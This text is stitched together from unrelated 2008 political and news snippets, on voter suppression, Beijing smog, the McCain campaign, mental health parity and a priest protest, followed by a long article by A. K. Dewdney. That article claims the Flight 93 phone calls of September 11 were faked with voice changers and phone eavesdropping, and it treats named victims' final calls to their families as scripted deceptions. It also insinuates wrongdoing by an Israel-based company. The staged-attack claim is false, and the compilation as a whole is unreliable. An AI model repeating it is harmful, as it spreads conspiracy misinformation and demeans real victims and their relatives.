Let there be no ambiguity about the matter :
This is unalloyed retaliatory intimidation , the purpose of which is as transparent as the mechanics of the Plutocrat Bailout have been opaque .
The rulers of this nation are aware that the financial system is in an irreversible implosion ; like their counterparts in the old Communist Party of the Soviet Union circa 1990 , they are prepared to strip this country bare before the collapse is consummated , and they ’re willing to ruin anybody with the means to pose any kind of plausible threat .
Cuban denies the allegations and promises to fight the SEC .
Taking on the Leviathan is an even more formidable prospect than throwing down with Karl Malone .
It would be worthwhile for decent people in numbers as large as can be arranged to let Cuban know that we have his back .
The Best of William Norman Grigg
Why are we hearing so much about voter fraud and so little about election fraud ?
After all , the odds of someone voting fraudulently are about the same as those of an American being struck and killed by lightning .
A microscopic evaluation of election data in the 2004 gubernatorial election in Washington state revealed that voter fraud occurred approximately 0.0009 percent of the time .
An analysis of the 2004 presidential election in Ohio revealed a voter fraud rate of 0.00004 percent .
In 1998 , Allan J. Lichtman , a consultant on voting rights , was asked by the state of Maryland to investigate charges that the Republican candidate for governor lost because of some 6,000 fraudulent votes .
He writes that he found " not a single fraudulent vote [ among ] the 1.4 million ballots cast in the election . "
A 2007 experts ' report to the federal Election Assistance Commission concluded that " false registration forms have not resulted in polling place fraud . "
The Department of Justice , which according to the attorney general has " made enforcement of election fraud and corruption offenses a top priority , " convicted only 24 people between 2002 and 2005 for voting fraud , an average of eight people a year .
And these convictions were of individuals guilty of themselves casting illegal votes , not of instigating widespread voting fraud .
On the other hand , evidence of what I will somewhat imprecisely call election fraud -- voter suppression by election officials and state governments -- is widespread and validated .
" Tens of thousands of eligible voters in at least six swing states have been removed from the rolls or have been blocked from registering in ways that appear to violate federal law , " the New York Times recently concluded after its own investigation .
The Times ' numbers do n't include efforts by state officials and private parties to discourage , intimidate or challenge eligible voters .
This is the type of voter fraud we should be hearing about .
Why are n't we ?
The principal reason may be explained in the title of one of the best reports on the subject , " The Politics of Voter Fraud " by Barnard Professor Lorraine C. Minnite .
Expanded voter rolls tend to favor Democrats .
One reason is that voter - registration drives are usually conducted in minority and low - income neighborhoods and on campuses , areas that are likely to vote Democratic .
Voter - suppression efforts , on the other hand , tend to favor Republicans because minorities , poor families and students will be least likely to overcome the new obstacles put in place .
SCROLL TO CONTINUE WITH CONTENT Never Miss a Beat .
Get our best delivered to your inbox .
Is this why in the third presidential debate , John McCain accused ACORN of being involved in voter fraud so massive that it " may be destroying the fabric of democracy " while not saying anything during his entire campaign about the far greater threat from widespread voter purging and voter - suppression initiatives ?
Is this why the Department of Justice has rapidly launched a national investigation of ACORN , the nation 's largest grass - roots organization advocating for low - and moderate - income families , but has not begun to investigate the illegal activities by states and private parties to reduce voting turnout ?
Raising the fear of individual voter fraud brings a short - term and a long - term advantage to those who would reduce the turnout of the disadvantaged and dispossessed .
In the short term , it hobbles registration and turnout efforts .
In the longer term , it helps to persuade state legislatures to pass laws that make it more difficult to vote .
Such was the case in Florida .
In 2004 , Florida Republicans accused ACORN of massive voter fraud .
The publicity given that charge and the ensuing investigation was as ubiquitous as the publicity now being given to attacks on ACORN .
A Florida court found ACORN innocent of all charges .
But in the meantime , the Florida legislature passed a law imposing stiff penalties for organizations that fail to turn in voter - registration applications later than 10 days after they were collected .
The law 's reporting requirements were so draconian the League of Women Voters ended 77 years of voter - registration activity in the state because it feared it could not comply and would be bankrupted if there were problems .
( A federal judge later blocked the implementation of the law as unconstitutional . )
The fear of voter fraud has resulted in states enacting burdensome and unnecessary photo ID laws for voting and in a federal law that allows voters to be challenged when their registration data deviates in even a small way from federal databanks ( for example , one set of data including a middle initial when the other does n't ) .
Republicans have seeded , then inflamed our fears of bottom - up voter fraud , even though voter fraud is a trivial problem and has never had an impact on the outcome of elections .
And that fear has tragically diverted our attention from the real enemy : top - down voter suppression initiatives that have indeed determined elections and are truly a threat to the fabric of democracy .
BEIJING ( AFP ) - The Chinese capital Beijing was again blanketed by smog on Tuesday despite intense anti-pollution measures , three days before the opening ceremony of the Olympic Games .
A murky haze hung over the Olympic village in the north of the city , obscuring the famous Bird 's Nest stadium where the ceremony will be held on Friday .
International Olympic Committee chief Jacques Rogge warned last year that poor air during the Games could result in the suspension of some events , particularly endurance races such as the marathon .
And athletes arriving in the city to compete in the event have already begun raising concerns about the air quality .
" The organisation is very good , but the pollution is no good , " said Turkish weightlifting coach Talat Unlu .
Indonesian team official Syafraidi Cut Ali said his country 's athletes would be taking precautions in an attempt to beat the smog .
" We stay in our bedrooms and the dining rooms , not in the open , " Ali told AFP .
" It is a problem . "
Beijing enjoyed unusually blue skies last weekend following last - minute anti-pollution measures introduced on July 20 .
Those measures included removing one million of the city 's 3.3 million cars from the roads and closing down more than 100 heavily polluting factories and building sites .
Chinese authorities have said they could take even more drastic steps if air quality remained poor .
Source : YN
See also :
The Latest Technology May Not Have Transformed Your Health , But It Has Changed Science
NASA Envisions Huge Lunar Telescope
Carbon Nanotube Windmills Powered by ' Electron Wind '
Posted on November 11 , 2008 in Political Cartoons
See Also : Harry Reid Throws Joe Lieberman To The Wolves , My GOP Advice , Lieberman ’s fate in the hands of the full caucus , Joe Lieberman is no Progressive , Lieberman Must Go Once and for All , “ ( D. ) for Vendetta ” , Reaching Across the Isle , What to do about Joe Lieberman ? , Lieberman at the Fulcrum , A Time for Mercy , and Option Three For Lieberman .
[ tags ] joe liebermann , back stabber , joe lieberman , democrats , political cartoon , knife in the back , campaigning against democrats , campaigning against obama , campaigned for republicans , caucus , image , traitor [ / tags ]
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
The planet is headed for an ecological credit crunch that will make Wall Street ’s convulsions look positively jolly .
In fact at the rate we ’re going we ’ll need two planets by 2030 .
That ’s because more than three quarters of the human population now live in countries where consumption outstrips environmental renewal , reports the BBC .
This makes them ecological debtors — drawing or overdrawing on land , forests , seas , and resources of other countries .
The Living Planet Report is the work of WWF , the Zoological Society of London and the Global Footprint Network .
According to the latter :
Our demand on nature , just as with the economy , is reaching a critical tipping point .
Two years ago , their data showed humanity on track to reach the two - planet mark by 2050 .
Now we ’ve accelerated our obsessive borrowing and should be there at around the time children born today are entering the workforce .
. .
Happy birthday , babies .
The countries with the biggest impact on the planet are the US and China , together accounting for 40 % of the global footprint .
The US also shares the limelight with the United Arab Emirates as the two nations with the largest ecological footprint per person .
Malawi and Afghanistan have the smallest .
“ The events in the last few months have served to show us how it ’s foolish in the extreme to live beyond our means , ” said WWF ’s international president , Chief Emeka Anyaoku .
“ Devastating though the financial credit crunch has been , it ’s nothing as compared to the ecological recession that we are facing . ”
More than $ 2 trillion lost on stocks and shares is dwarfed by the up to $ 4.5 trillion worth of resources destroyed forever each year .
Julia Whitty is Mother Jones ’ environmental correspondent , lecturer , and 2008 winner of the Kiriyama Prize and the John Burroughs Medal Award .
The explosive New York Times Magazine story on the complete disarray of the McCain campaign is live online !
It 's full of revealing exclusive info that one was previously forced to just infer based on the available evidence !
Like : the tone , strategy , and narrative of McCain 's campaign has been inconsistent because the candidate himself is terrible with organization and consistency , and has relied on metanarrative crafter / biographer Mark Salter , Rovian media guru Steve Schmidt , and close friend and day - to - day campaign head Rick Davis to work it all out between the three of them .
And there is infighting , of course , and everyone will soon blame everyone else , but honestly the ultimate responsibility for the failure of the campaign ( should it fail in two weeks , obv ) comes down to Senator McCain .
He 's a terrible candidate , unable to read from teleprompters and unwilling to do campaign events before 9 a .m..
He chafes at taking directions — told to gently explain once in the first debate that Obama might not understand an issue , McCain condescendingly repeated the mantra " Senator Obama does n't understand ... " ten times .
These are unfair and surely maddening criticisms — ability to read from a teleprompter is not actually that presidential a quality , or else Sarah Palin would be qualified — but this is the world we live in , and GOP strategists certainly helped create it .
But more importantly , his high self - regard makes him utterly unable to forgive or get over minor personal slights .
He can't understand why everyone else does n't see how much of an unprepared phony Barack Obama is , and the " I can't believe I 'm losing to this guy " attitude is always , always a loser — ask the last five Democrats to run for President not named Clinton .
His ability to justify his own inconsistencies is n't shared by the electorate either .
In his mind , he can square Palin 's inexperience and robocalls and negative campaigning with the honorable man he 's always been .
The constant schizophrenic narrative changes are , of course , Steve Schmidt 's fault .
And here 's some inside shit on the Palin pick — the serious grownups had a decent shortlist that included Pawlenty , Romney , and even Bloomberg .
But they were n't exciting and mavericky ernough , so Schmidt and Davis quietly picked Palin based entirely on image without examining substance .
The meeting carried on without Schmidt or Rick Davis uttering an opinion about Palin .
Few in the room were aware that the two had been speaking to each other about Palin for some time now .
Davis was with McCain when the two met Palin for the first time , at a reception at the National Governors Association winter meeting in February , in the J. W. Marriott Hotel in Washington .
It had not escaped McCain ’s attention that Palin had blasted through the oleaginous Alaska network dominated by Frank Murkowski and Ted Stevens , much in the same manner that McCain saw himself doing when he was a young congressman .
Newt Gingrich and others had spoken of Palin as a rising star .
Davis saw something else in Palin — namely , a way to re-establish the maverick persona McCain had lost while wedding himself to Bush ’s war .
A female running mate might also pick off some disaffected Hillary Clinton voters .
After that first brief meeting , Davis remained in discreet but frequent contact with Palin and her staff — gathering tapes of speeches and interviews , as he was doing with all potential vice - presidential candidates .
One tape in particular struck Davis as arresting : an interview with Palin and Gov. Janet Napolitano , the Arizona Democrat , on “ The Charlie Rose Show ” that was shown in October 2007 .
Reviewing the tape , it did n’t concern Davis that Palin seemed out of her depth on health - care issues or that , when asked to name her favorite candidate among the Republican field , she said , “ I ’m undecided . ”
What he liked was how she stuck to her pet issues — energy independence and ethics reform — and thereby refused to let Rose manage the interview .
This was the case throughout all of the Palin footage .
Consistency .
Confidence .
And . . . well , look at her .
A friend had said to Davis : “ The way you pick a vice president is , you get a frame of Time magazine , and you put the pictures of the people in that frame .
You look at who fits that frame best — that ’s your V. P. ” Schmidt , to whom Davis quietly supplied the Palin footage , agreed .
Neither man apparently saw her lack of familiarity with major national or international issues as a serious liability .
Instead , well before McCain made his selection , his chief strategist and his campaign manager both concluded that Sarah Palin would be the most dynamic pick .
Despite McInturff ’s encouraging new numbers , it remained their conviction that in this ominous election cycle , a Republican presidential candidate could not afford to play it safe .
Picking Palin would upend the chessboard ; it was a maverick type of move .
McCain , the former Navy pilot , loved that sort of thing .
Then again , he also loved familiarity — the swashbuckling camaraderie with his longtime staff members , the P.O.W. band of brothers who frequently rode the bus and popped up at his campaign events , the Sedona ranch where he unwound and grilled wagonloads of meat .
By contrast , McCain had barely met Palin .
Then " the senator took the governor down to a place where he usually had his coffee , beside a creek and a sycamore tree , where a rare breed of hawk seasonally nested , " and an hour later McCain had a running mate .
The Making ( and Remaking and Remaking ) of McCain [ NYT ]
For more than a dozen years , advocates have fought to lift restrictions on mental health coverage in insurance policies .
On Friday , they won an enormous victory when Congress passed the Paul Wellstone and Pete Domenici Mental Health Parity & Addiction Equity Act of 2008 .
The law does n’t require health insurers to cover mental health care .
But if they do , they ’ll have to treat psychological and addictive disorders just as they do other medical conditions .
Put another way , insurers will no longer be able to limit the number of visits or charge higher deductibles and co-payments for mental health and substance abuse services .
“ If you have insurance , then your mental health care must be equal to the benefits you get for any other disease , ” said Sen. Pete Domenici ( R - N.M. ) , quoted in a Reuters article .
His daughter has schizophrenia .
President Bush signed the bill into law after it was tacked onto the $ 700 billion financial bailout bill the House of Representatives passed 263- 171 on Friday .
Protest against priest who said Obama voters must repent David Edwards and Muriel Kane
Published : Monday November 17 , 2008
Print This Email This Several dozen protesters and counter - protesters lined up on Sunday outside a Greenville , SC Catholic church where the pastor has stated that any of his parishioners who voted for Barack Obama should repent before receiving communion .
In a letter posted last week on the church website , Father Jay Scott Newman wrote that " voting for a pro-abortion politician when a plausible pro-life alternative exists constitutes material cooperation with intrinsic evil . "
One of those protesting the pastor on Sunday carried a sign saying " St. Marys is Un- American . "
Another , whose dog wore an " Obama rules " t- shirt , explained to reporters , " This is Max .
He 's an Obama fan as well . "
However , there were also supporters of the pastor , with signs reading , " You ca n't be Catholic and pro-abortion " and " Thank you Fr. Newman for speaking the TRUTH . "
Newman had previously explained his position by saying that the abortion debate " engages the deepest human emotions " and had insisted in an email interview with the Greenville News that it is the " chief battleground " in the culture wars .
On Sunday , however , he had no comment for news cameras as he walked past the contending picketers .
This video is from CNN.com , broadcast Nov. 17 , 2008 .
Download video via RawReplay.com
The Cellphone and Airfone Calls from Flight UA93
A. K. Dewdney
Acknowledgment : I wish to thank Brad Mayeaux for assistance in preparing this article
Introduction
If the hijackings of September 11 were staged , the organization responsible would also be sure to add other elements to the basic plan , not only developing lists of hijackers , but sending fake cellphone calls from some of the passengers .
The following analysis focuses on Flight 93 , from which more alleged cellphone calls were made than from the other three flights combined .
It could be called the “ Cellphone Flight . ”
Like the staged attacks themselves , the calling operation would be complex , involving the a ) deployment of voice mimicry techniques , b ) gathering personal intelligence on at least some of the passengers , c ) coordination of calls with the operation ’s timeline .
1. Background
Any analysis of the cellphone and “ airfone ” calls from Flight 93 must begin with some basic , high - altitude cellphone facts .
According to AT&T spokesperson Alexa Graf , cellphones are not designed for calls from the high altitudes at which most airliners normally operate .
It was , in her opinion , a “ fluke ” that so many calls reached their destinations .
In the opinion of a colleague of mine who has worked in the cellphone industry , it was a “ miracle ” that any of the calls got through from altitude .
( See the recent proposal to install equipment to make cellphone calls possible from aircraft . )
An aircraft , having a metal skin and fuselage , acts like a Faraday cage , tending to block or attenuate electromagnetic radiation .
One can make a cellphone call from inside an aircraft while on the ground because the weakened signal is still close enough to the nearest cellsite ( relay tower ) to get picked up .
Once above 10,000 feet , however , calls rarely get through , if ever .
Here is the statement of an experienced airline pilot : “ The idea of being able to use a cellphone while flying is completely impractical .
Once through about 10,000 feet , the thing is useless , since you are too high and moving too fast ( and thus changing cells too rapidly ) for the phone to provide a signal . ”
( AVWeb , 1999 )
People boarding aircraft for the last decade or so have all heard the warnings to turn off their cellphones for the duration of the flight .
The reasons for this regulation are somewhat mysterious , since the usual explanation , that delicate aircraft electronics might be affected by cellphone signals , is cast somewhat in doubt by the fact that all avionics are shielded from stray electromagnetic radiation .
( Spitzer 1987 )
On the other hand , the FCC had apparently requested that airlines make this rule , owing to the tendency for cell phone calls made from aircraft at lower altitudes to create “ cascades ” that may lead to breakdown of cellsite operations .
( Fraizer 2002 )
The cascade problem is more likely at altitudes of 10,000 feet or lower , where reaching a cellsite , although still a touch - and - go matter , is more easily accomplished .
However , because of its superior position , the cellphone may reach several cellsites at once .
This can create problems , as software that determines which site is to handle the call makes its judgment based on the relative strength of calls .
If the call is made from an overhead position , it may well not be able to distinguish relative strength at different cellsites .
When this happens it is designed to close off the calling channel , selecting another channel in its place .
But the same problem of deciding which cellsite should handle the call also occurs on the new channel , so the new channel is closed , and so on .
One by one , in a rapid cascade that would last only seconds , all the channels would be closed , leading to a network - wide breakdown .
As I have pointed out elsewhere , cellphone calls from commercial aircraft much over 8000 feet are essentially impossible , while those below 8000 feet are highly unlikely down to about 2000 , where they become merely unlikely .
( Dewdney 2003 ) Moreover , even at the latter altitude ( and below ) , the handoff problem appears .
Any airliner at or below this altitude , flying at the normal speed of approximately 500 mph , would encounter the handoff problem ( Dewdney 2003 ) .
An aircraft traveling at this speed would not be over the cellsite long enough to complete the electronic “ handshake ” ( which takes several seconds to complete ) before arriving over the next cellsite , when the call has to be handed off from the first cellsite to the next one .
This also takes a few seconds , the result being , in the optimal case , a series of broken transmissions that must end , sooner or later , in failure .
It must also be remarked that the alleged hijackers of the Cellphone Flight were remarkably lenient with their passengers , allowing some 13 calls .
However , it would seem highly unlikely that hijackers would allow any phone calls for the simple reason that passengers could relay valuable positional and other information useful to authorities on the ground , thus putting the whole mission in jeopardy .
2 . The calls made from United Airlines Flight 93
The following analysis of the actual calls is based on text assembled by four reporters of the Pittsburgh Post - Gazette .
( Roddy et al. 2001 )
The calls were mostly rather brief and it must be borne in mind that , with the exception of two recorded messages , the persons called would not necessarily recollect the exact words which either they or the caller used .
Following a delay in its scheduled departure time of 8:01 am , Flight 93 reached its cruising altitude of approximately 30,000 feet about 40 minutes into the flight .
At about this time the takedown would have been initiated .
And at about this time , the aircraft was “ hijacked , ” according to several cellphone calls .
( Note that at this altitude the calls were flat - out impossible . )
CALL A1 : A man claiming to be Tom Burnett called his wife Deena in San Ramon , CA around 9:20 to Deena ’s best recollection :
Deena : “ Are you alright ? ”
Caller : “ No . I ’m on United Flight 93 from Newark to San Francisco .
The plane was hijacked .
We are in the air .
They ’ve already knifed a guy .
There is a bomb on board .
Call the FBI . ”
CALL B : Just before 9:30 am , a man claiming to be Jeremy Glick called Lyz Glick , who was visiting in - laws in the Catskills of New York state .
The phone was answered by Glick ’s mother - in - law , JoAnne Makely :
JoAnne : “ Jeremy .
Thank God .
We ’re so worried . ”
Caller : “ It ’s bad news .
Is Liz there ? ”
The caller went on to describe Arabic - looking hijackers wearing red headbands and carrying knives .
One had told the passengers he had a bomb .
The caller asked if it was true that planes had been crashed into the World Trade Center .
She confirmed this .
The caller mentioned that another passenger had heard the news on his / her cell phone .
CALL A2 : The man claiming to be Tom Burnett called Deena Burnett again around 9:30 am .
As Deena later described his call , “ He did n’t sound frightened , but he was speaking faster than he normally would . ”
He told her there were hijackers in the cockpit .
Deena : “ A lot of planes have been hijacked , but they do n’t know how many . ”
Caller : “ You ’ve got to be kidding . ”
Deena : “ No . ”
Caller : “ Were they commercial planes or airliners ? ”
Deena : “ I do n’t know . ”
Caller : “ Okay .
I ’ve got to go . ”
CALL C : A man claiming to be Mark Bingham called Bingham ’s sister - in - law , Cathy Hoglan , who was being visited by Bingham ’s mother , Alice .
Cathy took the call and handed the phone to Alice with the remark , “ Alice , talk to Mark .
He ’s been hijacked . ”
Caller : “ Mom ?
This is Mark Bingham . ”
Caller : “ I want you to know that I love you .
I ’m on a flight from Newark to San Francisco and there are three guys who have taken over the plane and they say they have a bomb . ”
Alice : “ Who are these guys ?
Caller : ( after a pause )
“ You believe me , do n’t you ?
Alice : “ Yes , Mark .
I believe you .
But who are these guys ?
( Af
ter another pause the line went dead . )
CALL D : A man claiming to be Todd Beamer on a United Airlines airfone had some trouble getting through to anyone but the Verizon customer service center , where the operator relayed the call to Verizon supervisor , Lisa Jefferson at 9:45 am .
( Verizon is a large communications company that has the contract for airfones on United airlines equipment . )
The man told Jefferson that the plane had been hijacked , that he could see three hijackers armed with knives , one of them claiming to have a bomb .
He described how the passengers had been herded to the rear of the aircraft , guarded by the one with the bomb .
He asked the supervisor to call the Beamer family on his behalf .
Caller : “ Oh !
We ’re going down .
( pause ) No .
We ’re okay .
I think we ’re turning around . ”
( It was approximately around this time that the flight , then passing near Cleveland , made a hard left toward Washington , DC . )
CALL A3 : The man claiming to be Tom Burnett called Deena Burnett again .
Deena :
“ They ’re taking airplanes and hitting landmarks all up and down the east coast . ”
Caller : “ Okay .
We ’re going to do something .
I ’ll call you back . ”
CALL F1 : At 9:47 , the answering machine of Lorne Lyles recorded a call that he thought was from his wife , CeeCee .
The woman could be heard praying for herself , her family , and even for the souls of the hijackers .
CALL B ( cont’d . )
State police , talking to Jeremy Glick ’s mother - in - law , asked her to relay a question to Jeremy .
Did he know where his plane was ?
He did n’t know , but said they had changed direction .
Caller : “ I need you to be happy and I will respect any decisions that you make . ”
He told Ms Lyles that the passengers were about to take a vote on whether to take back the aircraft .
Should they try ?
Lyz : “ Honey , you need to do it . ”
They spoke of weapons .
The caller joked .
Caller : “ I have my butter knife from breakfast . ”
CALL G : About this time , Phil Bradshaw , husband of flight attendant Sandy Bradshaw , received a phone call from a woman who identified herself as his wife .
Caller : “ Have you heard what ’s going on ?
My flight has been hijacked .
My flight has been hijacked by three guys with knives .
Phil asked her who was flying the plane .
Caller : “ I do n’t know who ’s flying the plane or where we are .
I see a river . ”
Bradshaw : “ Be safe and come home soon . ”
The caller then explained that she had to go .
She planned to prepare boiling water in the galley — to pour on the hijackers .
CALL H : Sometime after 9:30 , Fred Fiumano received a call from someone claiming to be his friend , Marion Britton .
The caller was crying , stating that the plane had been hijacked and that two passengers had already been killed .
Fiumano tried to console his friend , stating that the hijackers were probably going to take her for a ride .
“ You ’ll be alright . ”
CALL I : Jack Grandcolas in San Rafael , CA , received a call from a woman claiming to be Lauren Catuzzi Grandcolas , his wife .
The message , as recorded on his answering machine , was short :
Caller : “ Sweetie , pick up the phone if you can hear me .
( pause )
Okay , I love you .
There ’s a little problem with the plane .
I ’m fine and comfortable for now … ”
She asked Jack to pass along her love for everyone , then passed the airfone to her seat - mate .
Caller : “ Now you call your people . ”
CALL J : Esther Heymann received a call from a woman claiming to be her stepdaughter , Honor Elizabeth Wainio , also Grandcolas ’ seat - mate .
Caller : “ Mom , we ’re being hijacked .
I just called to say good bye . ”
Heymann : “ Elizabeth , we do n’t know how this is going to turn out .
I ’ve got my arms around you . ”
Wainio said she could feel them .
Heymann : “ Let ’s look out at that beautiful blue sky .
Let ’s be here in the moment .
Let ’s do some deep breathing together . ” ( pause )
Caller : “ It hurts me that it ’s going to be so much harder for you than it is for me . ”
CALL A4 : Once again , just before 10:00 am , Deena Burnett received a fourth phone call .
Caller : “ A group of us are going to do something . ”
Deena : “ No , Tom .
Just sit down and do n’t draw attention to yourself . ”
Caller : “ Deena , if they ’re going to crash the plane into the ground , we have to do something .
We ca n’t wait for the authorities .
We have to do something now . ”
Caller : “ Pray .
Just pray , Deena .
We ’re going to do something . ”
CALL D ( cont’d ) :
The caller who had identified himself as Todd Beamer appears to have remained connected with Lisa Jefferson , the Verizon supervisor , almost to the end of the flight .
At this point the caller was reciting the 23rd Psalm from the Bible
CALL F2 : The caller identifying herself as CeeCee Lyles finally got through to Lorne Lyles .
Caller : “ Babe , my plane ’s been hijacked . ”
Lyles : “ Huh ?
Stop joking .
Caller : “ No Babe , I would n’t joke like that .
I love you .
Tell the boys I love them . ”
As the couple prayed together , Lorne heard sounds that he would later interpret as passengers preparing a counterattack .
Caller :
They ’re going to force their way into the cockpit . ”
CALL D ( cont’d ) : Having finished his prayer session with Lisa Jefferson , the caller claiming to be Todd Beamer left the phone connected .
Jefferson recalls hearing the now famous rallying cry .
Caller : “ Are you guys ready ?
Let ’s roll . ”
CALL J ( cont’d ) : Esther Heymann , who believed herself to be talking with her step daughter , heard her last words .
Caller : I need to go .
They ’re getting ready to break into the cockpit .
I love you .
Goodbye . ”
CALL G ( cont’d ) : Phil Bradshaw heard his caller ’s last words to him .
Caller : “ Everyone ’s running to first class .
I ’ve got to go .
Bye . ”
CALL F2 ( cont’d ) : Lorne Lyles recalls hearing the last moments of Flight 93 .
Caller : ( screams )
“ They ’re doing it !
They ’re doing it !
They ’re doing it !
The caller screamed again , said something he could n’t hear , then the line went dead .
3. Operational details
How on Earth could any organization fake the calls I have just described ?
In the middle of writing this very sentence , I was interrupted by someone calling through the back door of our porch : “ Is anybody home ? ”
It was my son who was visiting us from out of town .
He had been out with some old friends .
I went out to the back porch to greet him .
It was n’t my son at all , but the neighbor next door wanting to borrow our ladder .
I marveled that I could have mistaken his voice for that of my son .
It has a different timbre and tone , yet the context of expectation overrode my ability to discriminate sounds .
One could say that my neighbor faked my son ’s return without even trying to .
This example proves nothing , of course , but it illustrates a fact that has been used by spiritualists and mediums to beguile clients for hundreds of years .
Anxious people , hoping to contact a deceased loved one , would typically report satisfaction with a seance .
“ I swear , it was my son .
There was no mistaking that sweet little voice . ”
The context leads the recipient of such a message actually to hear the loved one .
Of course , the tone of voice must be approximately correct .
In the case at hand , persons faking phone calls have the further advantage of electronic fuzzing , the tendency for audio lines with very low bandwidth to transmit the human voice somewhat imperfectly .
In addition , extreme emotional stress alters the human voice even more markedly , causing the person addressed to make unconscious allowances .
Telephone calls all have low bandwidth which simply means that many of the characteristics of the human voice are simply lost , like an out - of - focus photograph ; if you know that the picture taken at the lake last summer was of your sister , you will have no trouble “ recognizing her .
Yet if someone who somewhat resembles your sister , wearing the same clothes had stood in for your her , you would still “ know ” that it was your sister .
There are three ways to fake the telephonic voice of any person whatever .
First , voices can be mimicked .
With a little practice , you or I can sound like
a great many people .
Second , voices can be synthesized in near real time if one has a recording of the voice being recorded .
Software that was already well developed before September 11 , 2001 , was able to produce a very convincing quote from General Colin Powell of the Joint Chiefs : “ I am being treated well by my captors . ” ( Arkin 1999 ) Moreover , the mimicry is convincing even when played over a high bandwidth device such as a tape recorder .
The third way involves a device called a voice transformer or a voice changer , such devices having been under development for at least a decade .
( Ex. Pro 2004 ) ( Spook 2004 ) ( SeeStorm 2004 )
One speaks into a microphone , the sound pattern is digitized and , in real time the computer within the device produces a signal that is reconstituted as sound , a voice that can be entirely different from your own .
Everything you say will be spoken by the synthesized voice and with the same inflections , pauses and emphases .
You can transform your voice into that of an old man or a young girl .
You can alter the sound of the voice so produced by changing the settings of controls that govern pitch and voice formants , the overtones that make up what might be called the specific “ sound ” of a particular person ’s voice .
Of the three methods of faking a particular voice over the telephone , method number three is obviously preferable .
However , it was the content of the alleged cellphone calls that caught the attention of the American public as confirming that the calls had been made as alleged .
The caller seemed to know at least a few “ personal details ” about the person being called .
As far as we can determine , these details involved the pet name for one ’s partner , as well as other commonplace items such as references to “ the kids , ” and so on .
The question therefor arises how the caller could have known these details .
There are at least two ways .
First , several passengers aboard Flight 77 were undoubtedly frequent flyers .
Agents taking the flight on several occasions prior to September 11 would have an ample opportunity to engage numerous fellow passengers in chitchat , meanwhile recording their voices .
“ Take this flight often ? ”
The recordings would contain information about timbre , pitch and other voice characteristics , as well as a wealth of “ personal information . ” the second way is to listen in on phone conversations .
In this connection it must be mentioned that the vast majority of telephone calls made every day in the United States pass through the AMDOCS Company billing system , a telephone facility headquartered in Israel which has long been suspected as providing a golden opportunity for anyone with real time access to the calls passing through the AMDOCS system to eavesdrop on conversations .
( Curtiss 2003 ) ( WRH 2004 )
“ Sweetie , would you drop by the store on your way home and pick up ice cream for Jenny and Bobby ? ”
Of course , the organization involved would have obtained copies of the flight manifests well before the flight or it could have simply eavesdropped on the phone reservation systems for American and United Airlines .
On the fateful day the calling operation would take place in an operations center , basically a sound studio that is equipped with communication lines and several telephones .
An operations director displays a scripted sequence of events on a screen so that the voice operators know what stage the “ hijacking ” is supposed to be at .
All calls are orchestrated to follow the script .
For example , shortly after the takedown of Flight 77 , ( See Dewdney 2003 b ) the first bogus calls from Flight 77 are made .
Other pseudo - events in the script include the first appearance of the hijackers , their announcement , scuffles with passengers , the back - of - the - plane strategy session , and the final rush to the cockpit .
It would also include real events such as the aircraft ’s turn mentioned in Call D .
To supplement the calls with real sound effects , an audio engineer would have several tapes ready to play .
The tapes , which portray mumbled conferences among passengers or muffled struggles , replete with shouts and curses , can be played over any of the phone lines , as determined by the script , or simply fed as ambient sound into the control room .
Trained operators with headsets make the actual calls , talking into voice changers that have been adjusted to reproduce the timbre of voice for every passenger designated to make cellphone calls .
Each operator has studied tapes for several of the individuals , as recorded on prior occasions of Flight 93 , as well as profiles of the individuals , including many items of personal information , obtained by he methods previously explained .
The introductory sentence would carry the hook : “ Honey , we ’ve been hijacked ! ”
Thereafter , with the belief framework installed , the operator can react to questions , literally playing the situation by ear , but being sure to include pertinent details such as “ Arab - looking guys , ” “ boxcutters , ” and all the rest .
If the contact has been made successfully in the operator ’s opinion , with the essential information conveyed , it is always possible to terminate the call more or less gracefully , depending on what portion of the script is under execution .
“ Okay .
We ’re going to do something .
I ’ll call you back . ”
Click .
Operators would have received general instructions about what do to in the course of a call .
Although each has been supplied with at least some “ intimate ” details of the target ’s life , there would be techniques in place for temporizing or for avoiding long conversations where basic lack of knowledge might threaten to become suddenly obvious , and so on .
Three such techniques are praying ( from text , if necessary ) ( Calls D , F1 , and J ) , crying ( as in call H ) , or discussing the other attacks ( as in call A2 and B ) .
In the case at hand , Flight 93 , various calls may now be examined as a consistency check .
First , it must be noted that the longest call was made by the person who identified himself as Todd Beamer ( Call D ) to someone whom the real Todd Beamer did not know at all , Lisa Jefferson , a Verizon supervisor .
Among the shorter conversations were Calls B , A2 and D .
Early in Call B ( Glick ) , the caller indicates that it is general knowledge among the passengers that other aircraft have been hijacked that morning .
Near the end of this conversation , when the caller discusses possible actions against the hijackers , he makes a joking remark :
Caller : “ I have my butter knife from breakfast . ”
This is strange because it implies that the caller had already finished breakfast , whereas meals are not normally served until the aircraft reaches cruising altitude , about the time that the alleged hijacking began .
In Call A2 ( Burnett ) , Deena Burnett describes the other hijackings .
A2 Deena : “ A lot of planes have been hijacked , but they do n’t know how many . ”
Caller : “ You ’ve got to be kidding . ”
Deena : “ No . ”
Caller : “ Were they commercial planes or airliners ? ”
Here , the caller seems to be temporizing .
Not only are hijackings of commercial ( i. e. , cargo ) aircraft extremely rare events , the caller ’s apparent surprise contradicts the implication of Call B ( made earlier ) that the other attacks were already general knowledge among the passengers of Flight 93 .
Call C , also short , may point to a possible fumble .
Was one of the callers asleep at the switch ?
Caller : “ Mom ?
This is Mark Bingham . ”
Caller : “ I want you to know that I love you .
I ’m on a flight from Newark to San Francisco and there are three guys who have taken over the plane and they say they have a bomb . ”
Alice : “ Who are these guys ?
Caller : ( after a pause )
“ You believe me , do n’t you ?
Caller : “ Yes , Mark .
I believe you .
But who are these guys ?
Alice Bingham attributed the strange introductory sentence to her son being flustered .
But if Mark chose his mother to call , over all other people in the world , would he be likely to make such a mistake ?
Would thoughts of his mother not be uppermost in his mind , no matter what happened in the passenger compart
ment ?
A caller can only make such a mistake if he or she is thinking of something entirely unrelated to the reason for the call or the person being called and that can hardly have been the case in the alleged circumstances .
Instead of answering the mother ’s question , the caller seems uncertain .
Mrs. Bingham has just asked “ Who are these guys ? ” and the caller answers with another question .
Does she believe his previous sentence ?
The caller , who may have lost confidence in the call , terminates the conversation ( possibly pounding his forehead in silent frustration ) .
Caller C never called back .
Of the 13 phone calls allegedly made from the plane , four were from one caller ( A : Burnett ) , two were from another ( F : Lyles ) , and the remaining seven calls were not repeated .
Non-repeated calls would thus represent final exits with either flubbed results or a smooth performance .
